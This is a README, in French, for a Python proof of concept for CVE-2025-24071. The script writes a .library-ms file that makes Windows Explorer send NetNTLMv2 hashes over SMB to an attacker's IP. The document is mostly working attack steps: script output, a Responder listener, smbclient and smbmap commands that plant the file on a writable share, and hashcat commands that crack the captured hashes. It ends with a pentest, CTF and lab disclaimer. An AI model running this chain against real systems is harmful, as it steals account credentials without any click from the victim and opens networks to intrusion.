
PoC Python pour CVE-2025-24071 qui fabrique un fichier .library-ms afin de forcer Windows Explorer à divulguer des hachages NetNTLMv2 via SMB pour capture et cassage.
CVE-2025-24071 — coercition NTLM .library-ms (méthode SMB / TAR)
Demande votre IP d'attaque et un nom de fichier, écrit un .library-ms pointant vers
\\<IP>\share, et l'empaquette dans exploit.tar. Lorsqu'Explorer parcourt le dossier dans lequel
le .library-ms isolé atterrit, il résout automatiquement ce chemin UNC et divulgue le
NTLMv2 du compte à votre listener — aucun clic nécessaire.
⚠️ C'est le
.library-msisolé qui se déclenche — pas le.tar. Un.tarposé sur le partage est inerte ; Explorer ne parse pas les tarballs. Vous devez placer le.library-mslui-même sur le partage en tant que fichier isolé. La façon de procéder dépend de l'outil (ci-dessous).
uv run coerce_library.py # or: python3 coerce_library.py
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms -> \\10.10.14.197\share
[+] packed into exploit.tar
sudo responder -I tun0
.library-ms sur un partage accessible en écrituresmbclient — téléversez le .tar, extrayez-le côté serveur avec tar x (dépose le
.library-ms isolé à côté) :
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'
smbmap — n'a pas d'étape d'extraction, donc téléversez le .library-ms isolé directement
(téléverser le .tar ici ne fait rien — il ne peut pas le décompresser) :
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'
Confirmez qu'il a atterri isolé sur le partage :
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
☧ usage en test d'intrusion autorisé / CTF / labo uniquement ☧